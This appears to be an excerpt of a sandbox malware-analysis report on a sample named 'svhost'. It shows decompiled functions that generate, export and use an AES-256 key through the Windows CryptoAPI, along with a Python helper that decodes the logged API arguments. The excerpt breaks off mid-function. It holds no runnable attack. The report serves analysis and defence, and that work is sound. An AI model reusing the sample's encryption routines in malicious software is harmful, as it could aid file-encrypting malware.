                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CryptEncrypt
                                      • String ID:
                                      • API String ID: 1352496322-0
                                      • Opcode ID: 92301a941e5c036af399682a7fba3400fa1940a29adf5fee5d22c9b5463fe900
                                      • Instruction ID: 80a530467fece4b7984eeeea3e4665a2a8a59e0a592e36096a3b34a15ed68f71
                                      • Opcode Fuzzy Hash: 92301a941e5c036af399682a7fba3400fa1940a29adf5fee5d22c9b5463fe900
                                      • Instruction Fuzzy Hash: B101A271948288AFDB01CFA8DC11FABBBBCEB05740F008169F915AB3C1C635990087A0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00E66210(intOrPtr __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12) {
                                      				char _v16;
                                      				char _v17;
                                      				intOrPtr _v24;
                                      				signed int _t11;
                                      				void* _t15;
                                      				signed int _t22;
                                      
                                      				_t11 =  *0xeef074; // 0x221cac15
                                      				 *[fs:0x0] =  &_v16;
                                      				_v24 = __ecx;
                                      				_t15 = E00E634C0(_a8, 0);
                                      				__imp__CryptExportKey(_a4, 0, 8, 0, _t15,  &_a12, _t11 ^ _t22,  *[fs:0x0], 0xec0490, 0xffffffff);
                                      				if(_t15 == 0) {
                                      					_v17 = 0;
                                      				} else {
                                      					_v17 = 1;
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return _v17;
                                      			}

                                      Addresses (decompiler address column): 0x00e66224, 0x00e6622f, 0x00e66235, 0x00e66241, 0x00e66251, 0x00e66259, 0x00e66261, 0x00e6625b, 0x00e6625b, 0x00e6625b, 0x00e6626b, 0x00e66276

                                      APIs
                                      • CryptExportKey.ADVAPI32(?,00000000,00000008,00000000,00000000,00000000,?,221CAC15,?,00000000,221CAC15), ref: 00E66251
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CryptExport
                                      • String ID:
                                      • API String ID: 3389274496-0
                                      • Opcode ID: 6bf78e9744c37c54338b584c24e3e4bc694bb78d6e0db1653196a2733665c9f5
                                      • Instruction ID: c441e45dca14e99a2eeeea11804372611c18cd3fd207b56d90ddba9b5a5eed57
                                      • Opcode Fuzzy Hash: 6bf78e9744c37c54338b584c24e3e4bc694bb78d6e0db1653196a2733665c9f5
                                      • Instruction Fuzzy Hash: C601A471A88288EFD711CF64EC11FAABBBCE704B50F008269F915BB2C0CA75A5048750
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00EB115C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                      				intOrPtr _t17;
                                      				signed int _t29;
                                      				void* _t31;
                                      
                                      				E00E8AA70(__ebx, __edi, __esi, 0xeed7f8, 0xc);
                                      				 *(_t31 - 0x1c) =  *(_t31 - 0x1c) & 0x00000000;
                                      				E00EA5B71( *((intOrPtr*)( *((intOrPtr*)(_t31 + 8)))));
                                      				 *(_t31 - 4) =  *(_t31 - 4) & 0x00000000;
                                      				 *0xef3738 = E00EA5638( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t31 + 0xc)))))));
                                      				_t29 = EnumSystemLocalesW(0xeb114f, 1);
                                      				_t17 =  *0xeef074; // 0x221cac15
                                      				 *0xef3738 = _t17;
                                      				 *(_t31 - 0x1c) = _t29;
                                      				 *(_t31 - 4) = 0xfffffffe;
                                      				E00EB11CC();
                                      				 *[fs:0x0] =  *((intOrPtr*)(_t31 - 0x10));
                                      				return _t29;
                                      			}

                                      Addresses (decompiler address column): 0x00eb1163, 0x00eb1168, 0x00eb1171, 0x00eb1177, 0x00eb1188, 0x00eb119a, 0x00eb119c, 0x00eb11a1, 0x00eb11a6, 0x00eb11a9, 0x00eb11b0, 0x00eb11ba, 0x00eb11c6

                                      APIs
                                        • Part of subcall function 00EA5B71: EnterCriticalSection.KERNEL32(-00EF33B8,?,00EAD158,00000000,00EED650,0000000C,00EAD11F,?,?,00EB04F5,?,?,00EB109F,00000001,00000364,00000006), ref: 00EA5B80
                                      • EnumSystemLocalesW.KERNEL32(00EB114F,00000001,00EED7F8,0000000C,00EB157A,00000000), ref: 00EB1194
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                      • String ID:
                                      • API String ID: 1272433827-0
                                      • Opcode ID: bc9e70ca60695c96437191543dffb398dd45ac21994ace6760b636db3a3d07be
                                      • Instruction ID: df314662c76301f8f167840de702bc926f867b1bf5c90eed5c564200627c7755
                                      • Opcode Fuzzy Hash: bc9e70ca60695c96437191543dffb398dd45ac21994ace6760b636db3a3d07be
                                      • Instruction Fuzzy Hash: C5F037B6A01204EFD700EFA9E882BAAB7E0EB49721F10516AF510EB2E0D6755944CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E00EB924C(void* __ecx, void* __edx, void* __eflags, signed char* _a4) {
                                      				intOrPtr _t9;
                                      				signed char* _t13;
                                      				intOrPtr* _t15;
                                      				void* _t19;
                                      				void* _t21;
                                      
                                      				_t19 = E00EB0EFC(__ecx, __edx);
                                      				_t15 =  *((intOrPtr*)(_t19 + 0x54));
                                      				_t21 = _t15 + 2;
                                      				do {
                                      					_t9 =  *_t15;
                                      					_t15 = _t15 + 2;
                                      				} while (_t9 != 0);
                                      				 *(_t19 + 0x64) = 0 | _t15 - _t21 >> 0x00000001 == 0x00000003;
                                      				EnumSystemLocalesW(0xeb91a5, 1);
                                      				_t13 = _a4;
                                      				if(( *_t13 & 0x00000004) == 0) {
                                      					 *_t13 = 0;
                                      					return _t13;
                                      				}
                                      				return _t13;
                                      			}

                                      Addresses (decompiler address column): 0x00eb9258, 0x00eb925c, 0x00eb925f, 0x00eb9262, 0x00eb9262, 0x00eb9265, 0x00eb9268, 0x00eb9280, 0x00eb9283, 0x00eb9289, 0x00eb928f, 0x00eb9291, 0x00000000, 0x00eb9291, 0x00eb9296

                                      APIs
                                        • Part of subcall function 00EB0EFC: GetLastError.KERNEL32(00000008,00E62ABC,00000000,00EB2C01,00E76827,00E7686D,?,00E76684,00000000,00000000), ref: 00EB0F01
                                        • Part of subcall function 00EB0EFC: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00E76684,00000000,00000000), ref: 00EB0F9F
                                      • EnumSystemLocalesW.KERNEL32(00EB91A5,00000001,00000001,?,?,00EB9A0D,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00EB9283
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem
                                      • String ID:
                                      • API String ID: 2417226690-0
                                      • Opcode ID: c8da5166b4585535f2c50eb17551d11d696637ae64be1e883deab98882e83de7
                                      • Instruction ID: 92b46f05daa9ae127429786de24179c4002793c38d1df707ce8e133a3634c324
                                      • Opcode Fuzzy Hash: c8da5166b4585535f2c50eb17551d11d696637ae64be1e883deab98882e83de7
                                      • Instruction Fuzzy Hash: C0F0553670020567DB049F79D805AABBF94EFC1714F0A4068EB09DB6A1C672DC42CB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00E660F0(intOrPtr __ecx, intOrPtr _a4, signed int _a8, char _a12) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr _v16;
                                      				signed int _t11;
                                      				intOrPtr _t14;
                                      				void* _t17;
                                      				void* _t23;
                                      				void* _t24;
                                      				signed int _t25;
                                      
                                      				_t11 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t11 ^ _t25;
                                      				_v16 = __ecx;
                                      				_v12 = _a12;
                                      				_t22 = _a8 & 0x000000ff;
                                      				_t14 = _a4;
                                      				__imp__CryptEncrypt(_t14, 0, _a8 & 0x000000ff, 0, 0,  &_v12, 0);
                                      				if(_t14 == 0) {
                                      					_v12 = 0;
                                      				}
                                      				return E00E89A35(_t17, _v8 ^ _t25, _t22, _t23, _t24);
                                      			}

                                      Addresses (decompiler address column): 0x00e660f6, 0x00e660fd, 0x00e66100, 0x00e66106, 0x00e66113, 0x00e6611a, 0x00e6611e, 0x00e66126, 0x00e66128, 0x00e66128, 0x00e6613f

                                      APIs
                                      • CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,00000000,?,?,221CAC15), ref: 00E6611E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CryptEncrypt
                                      • String ID:
                                      • API String ID: 1352496322-0
                                      • Opcode ID: fcf4b445357a810d950c6528dce18c32aeb9f1203e10143da2105d13d8de9685
                                      • Instruction ID: 4668a4bed41aad4f87b3b7a84e0c44528ce53f0f7883cfcf4778735561b05b2e
                                      • Opcode Fuzzy Hash: fcf4b445357a810d950c6528dce18c32aeb9f1203e10143da2105d13d8de9685
                                      • Instruction Fuzzy Hash: 1BF0F475A4420CBFDB04DFA5D855FAE7BB4EB58700F408099F905AB281D6759A448B50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 37%
                                      			E00E66150(intOrPtr __ecx, intOrPtr _a4) {
                                      				signed int _v8;
                                      				char _v12;
                                      				intOrPtr _v16;
                                      				signed int _t9;
                                      				char* _t11;
                                      				void* _t14;
                                      				void* _t19;
                                      				void* _t20;
                                      				void* _t21;
                                      				signed int _t22;
                                      
                                      				_t9 =  *0xeef074; // 0x221cac15
                                      				_v8 = _t9 ^ _t22;
                                      				_v16 = __ecx;
                                      				_v12 = 0;
                                      				_t11 =  &_v12;
                                      				__imp__CryptExportKey(_a4, 0, 8, 0, 0, _t11);
                                      				if(_t11 == 0) {
                                      					_v12 = 0;
                                      				}
                                      				return E00E89A35(_t14, _v8 ^ _t22, _t19, _t20, _t21);
                                      			}

                                      Addresses (decompiler address column): 0x00e66156, 0x00e6615d, 0x00e66160, 0x00e66163, 0x00e6616a, 0x00e6617a, 0x00e66182, 0x00e66184, 0x00e66184, 0x00e6619b

                                      APIs
                                      • CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000,?), ref: 00E6617A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CryptExport
                                      • String ID:
                                      • API String ID: 3389274496-0
                                      • Opcode ID: cae6bb3c5948325cbc859ed7f83b135bc139affbf6d388ec5d53d693c6b46d3c
                                      • Instruction ID: f1c23f66532c0909d227bdd24719f62f4d4d6d355e4485cb2c06e141f902118e
                                      • Opcode Fuzzy Hash: cae6bb3c5948325cbc859ed7f83b135bc139affbf6d388ec5d53d693c6b46d3c
                                      • Instruction Fuzzy Hash: 30F03770E4020CBFD714DF95DC51B9DBBB4AB14700F5080A9E505AB2C1DA7166048B44
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,00EAF1EF,?,20001004,00000000,00000002,?,?,00EAE7DA), ref: 00EB1709
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID:
                                      • API String ID: 2299586839-0
                                      • Opcode ID: 5f893a9010a488b7765511a07a92242812f520a83f51d0f8803075d4ee5a56b0
                                      • Instruction ID: 134060bfdfbaf3112b835287bec9699d53f1ea2ea1e49e8baa896ca6a3fe74a6
                                      • Opcode Fuzzy Hash: 5f893a9010a488b7765511a07a92242812f520a83f51d0f8803075d4ee5a56b0
                                      • Instruction Fuzzy Hash: C7E09A32100228BBCF122FA1EC28EDE3F2ABF44760F444020FC0072161CB328A21AA90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CryptGenKey.ADVAPI32(?,00006610,00000001,?,?,221CAC15), ref: 00E660AB
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Crypt
                                      • String ID:
                                      • API String ID: 993010335-0
                                      • Opcode ID: 77ac9cd9710f86c65a39832e2790facbe719987a5ee69d3a96d5c2c64a831207
                                      • Instruction ID: 08413a901ca5cc29829fc65209323d09a8b1d75e549be5d76b7fbf3912ea70d7
                                      • Opcode Fuzzy Hash: 77ac9cd9710f86c65a39832e2790facbe719987a5ee69d3a96d5c2c64a831207
                                      • Instruction Fuzzy Hash: 85E0D8745483486BDB10CAA4D891BEEBF785B01300F048098E9446B381C673858AD7E2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E00E660D0(intOrPtr __ecx, long* _a4) {
                                      				intOrPtr _v8;
                                      				void* _t4;
                                      
                                      				_push(__ecx);
                                      				_v8 = __ecx;
                                      				if(_a4 != 0) {
                                      					return CryptDestroyKey(_a4);
                                      				}
                                      				return _t4;
                                      			}
                                      APIs
                                      • CryptDestroyKey.ADVAPI32(00000000,00000000,?,00E655BF,?,00000000,?,00E65585,?), ref: 00E660E1
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CryptDestroy
                                      • String ID:
                                      • API String ID: 1712904745-0
                                      • Opcode ID: 14e09b62024179ad98e739781a8a0e96822b6d07e4bb9c3ceface2d70b7d6e68
                                      • Instruction ID: 91a0f1cd0a698dd46fe377e72be84f8b2fc8f3b857ae2c36cfeb7721aa68c8b6
                                      • Opcode Fuzzy Hash: 14e09b62024179ad98e739781a8a0e96822b6d07e4bb9c3ceface2d70b7d6e68
                                      • Instruction Fuzzy Hash: 77C012B145420CABC714CF95E809E997BACD704345F008169BE0457240D636D950C695
                                      Uniqueness

                                      Uniqueness Score: -1.00%
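                                      The CryptGenKey record above (Algid 00006610, dwFlags 00000001, ref 00E660AB) and the E00E660D0 wrapper that calls CryptDestroyKey only on a non-null handle are the CAPI key lifecycle this part of the report captures. The raw hex arguments are easy to misread, so the following is an added example, not code from the sample or from Joe Sandbox, that decodes them using the documented wincrypt.h layout: an ALG_ID is class (bits 13-15), type (bits 9-12) and sub-id (bits 0-8), so 0x6610 is ALG_CLASS_DATA_ENCRYPT | ALG_TYPE_BLOCK | ALG_SID_AES_256, i.e. CALG_AES_256, and dwFlags 0x1 is CRYPT_EXPORTABLE (the precondition for a later CryptExportKey). CryptGenKey takes four parameters (hProv, Algid, dwFlags, phKey); the assumption made here is that the two values the report prints after the fourth are stack contents beyond the parameter list, so they are ignored. The sample line is copied from the report entry above; the "?" entries are arguments the sandbox could not resolve.

```python
"""Decode the CryptGenKey arguments recorded in a sandbox API line.

Added example for this report; not code from the sample or from Joe Sandbox.
The ALG_ID bit layout and the CALG_*/CRYPT_* values are the documented
wincrypt.h constants. SAMPLE_LINE is copied from the report entry above.
"""
import re

# ALG_ID layout (wincrypt.h): bits 13-15 class, bits 9-12 type, bits 0-8 sub-id.
ALG_CLASS = {
    1 << 13: "ALG_CLASS_SIGNATURE",
    2 << 13: "ALG_CLASS_MSG_ENCRYPT",
    3 << 13: "ALG_CLASS_DATA_ENCRYPT",
    4 << 13: "ALG_CLASS_HASH",
    5 << 13: "ALG_CLASS_KEY_EXCHANGE",
}
ALG_TYPE = {
    0 << 9: "ALG_TYPE_ANY",
    1 << 9: "ALG_TYPE_DSS",
    2 << 9: "ALG_TYPE_RSA",
    3 << 9: "ALG_TYPE_BLOCK",
    4 << 9: "ALG_TYPE_STREAM",
    5 << 9: "ALG_TYPE_DH",
}
CALG_NAMES = {
    0x6601: "CALG_DES", 0x6602: "CALG_RC2", 0x6603: "CALG_3DES",
    0x6609: "CALG_3DES_112", 0x660E: "CALG_AES_128", 0x660F: "CALG_AES_192",
    0x6610: "CALG_AES_256", 0x6611: "CALG_AES", 0x6801: "CALG_RC4",
    0x2400: "CALG_RSA_SIGN", 0xA400: "CALG_RSA_KEYX",
}
# CryptGenKey dwFlags: named bits in the low 16 bits, requested key length in
# bits (where the algorithm allows a choice) in the high 16 bits.
GENKEY_FLAGS = {
    0x0001: "CRYPT_EXPORTABLE",
    0x0002: "CRYPT_USER_PROTECTED",
    0x0004: "CRYPT_CREATE_SALT",
    0x0008: "CRYPT_UPDATE_KEY",
    0x0010: "CRYPT_NO_SALT",
    0x0040: "CRYPT_PREGEN",
    0x4000: "CRYPT_ARCHIVABLE",
    0x8000: "CRYPT_FORCE_KEY_PROTECTION_HIGH",
}

# Report format: "Func.DLL(arg,arg,...), ref: ADDR"
API_LINE = re.compile(r"(\w+)\.(\w+)\((.*?)\),\s*ref:\s*([0-9A-Fa-f]+)")


def decode_alg_id(alg_id):
    """Split an ALG_ID into class/type/sub-id and name it when it is a known CALG_*."""
    return {
        "value": alg_id,
        "name": CALG_NAMES.get(alg_id, "unknown"),
        "class": ALG_CLASS.get(alg_id & (7 << 13), "unknown"),
        "type": ALG_TYPE.get(alg_id & (15 << 9), "unknown"),
        "sid": alg_id & 0x1FF,
    }


def decode_genkey_flags(flags):
    """Name the CryptGenKey flag bits; report unknown low bits as hex."""
    names = [n for bit, n in sorted(GENKEY_FLAGS.items()) if flags & bit]
    unknown = flags & 0xFFFF & ~sum(GENKEY_FLAGS)
    if unknown:
        names.append("0x%04X" % unknown)
    return {"flags": names, "key_bits": flags >> 16}


def parse_api_line(line):
    """Parse one report API line; '?' means the sandbox could not resolve the value."""
    m = API_LINE.search(line)
    if not m:
        raise ValueError("not an API line: %r" % line)
    func, dll, raw_args, ref = m.groups()
    args = [None if a.strip() == "?" else int(a, 16) for a in raw_args.split(",")]
    return {"func": func, "dll": dll, "args": args, "ref": int(ref, 16)}


def decode_cryptgenkey(line):
    """CryptGenKey(hProv, Algid, dwFlags, phKey): decode Algid and dwFlags.

    Assumption: values printed after the fourth argument are stack contents
    beyond the real parameter list, so they are ignored.
    """
    call = parse_api_line(line)
    if call["func"] != "CryptGenKey":
        raise ValueError("expected CryptGenKey, got %s" % call["func"])
    _hprov, alg_id, flags, _phkey = (call["args"] + [None] * 4)[:4]
    return {
        "ref": call["ref"],
        "alg": decode_alg_id(alg_id) if alg_id is not None else None,
        "flags": decode_genkey_flags(flags) if flags is not None else None,
    }


# Copied from the report entry above.
SAMPLE_LINE = "CryptGenKey.ADVAPI32(?,00006610,00000001,?,?,221CAC15), ref: 00E660AB"

if __name__ == "__main__":
    info = decode_cryptgenkey(SAMPLE_LINE)
    print("call at 0x%08X" % info["ref"])
    print("algorithm:", info["alg"]["name"], info["alg"]["class"], info["alg"]["type"])
    print("flags:", info["flags"]["flags"], "key bits:", info["flags"]["key_bits"] or "default")
```

                                      Run against the report line, this prints CALG_AES_256 / ALG_CLASS_DATA_ENCRYPT / ALG_TYPE_BLOCK with CRYPT_EXPORTABLE and a default key length, so the handle that E00E660D0 later passes to CryptDestroyKey is an exportable AES-256 session key. The same parser works on any other "Func.DLL(args), ref:" line in the report; only the per-API decoding step is specific to CryptGenKey.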

                                      C-Code - Quality: 91%
                                      			E00EA19FD(signed char* _a4, signed char* _a8, signed int _a12) {
                                      				signed int _t688;
                                      				void* _t690;
                                      				signed int _t693;
                                      				void* _t697;
                                      				void* _t699;
                                      				signed char _t756;
                                      				signed char _t757;
                                      				signed char _t758;
                                      				signed char _t759;
                                      				signed char _t761;
                                      				signed char _t762;
                                      				signed char _t763;
                                      				signed int _t812;
                                      				signed int _t813;
                                      				signed int _t814;
                                      				signed char* _t815;
                                      				signed int _t816;
                                      				signed char* _t818;
                                      				signed char* _t819;
                                      				signed int _t820;
                                      				void* _t842;
                                      				signed int _t868;
                                      				signed char* _t871;
                                      				signed char* _t872;
                                      				void* _t904;
                                      				void* _t906;
                                      				void* _t908;
                                      				void* _t910;
                                      				void* _t912;
                                      				void* _t914;
                                      				void* _t916;
                                      				void* _t918;
                                      				signed char* _t935;
                                      				signed char* _t936;
                                      				signed int _t938;
                                      				signed char* _t941;
                                      				signed char* _t942;
                                      
                                      				_t812 = _a12;
                                      				_t688 = _t812;
                                      				if(_t688 == 0) {
                                      					__eflags = 0;
                                      					return 0;
                                      				}
                                      				_t690 = _t688 - 1;
                                      				if(_t690 == 0) {
                                      					_t813 =  *_a4 & 0x000000ff;
                                      					_t693 =  *_a8 & 0x000000ff;
                                      					L348:
                                      					_t814 = _t813 - _t693;
                                      					__eflags = _t814;
                                      					if(_t814 != 0) {
                                      						__eflags = _t814;
                                      						_t672 = _t814 > 0;
                                      						__eflags = _t672;
                                      						_t814 = (0 | _t672) * 2 - 1;
                                      					}
                                      					L350:
                                      					return _t814;
                                      				}
                                      				_t697 = _t690 - 1;
                                      				if(_t697 == 0) {
                                      					_t815 = _a4;
                                      					_t935 = _a8;
                                      					_t868 = ( *_t815 & 0x000000ff) - ( *_t935 & 0x000000ff);
                                      					__eflags = _t868;
                                      					if(_t868 != 0) {
                                      						L353:
                                      						_t816 = 0;
                                      						__eflags = _t868;
                                      						L346:
                                      						_t814 = (_t816 & 0xffffff00 | __eflags > 0x00000000) * 2 - 1;
                                      						goto L350;
                                      					}
                                      					_t813 = _t815[1] & 0x000000ff;
                                      					_t684 =  &(_t935[1]); // 0xcc483c9
                                      					_t693 =  *_t684 & 0x000000ff;
                                      					goto L348;
                                      				}
                                      				_t699 = _t697 - 1;
                                      				if(_t699 == 0) {
                                      					_t818 = _a4;
                                      					_t936 = _a8;
                                      					_t868 = ( *_t818 & 0x000000ff) - ( *_t936 & 0x000000ff);
                                      					__eflags = _t868;
                                      					if(_t868 != 0) {
                                      						goto L353;
                                      					}
                                      					_t678 =  &(_t936[1]); // 0xcc483c9
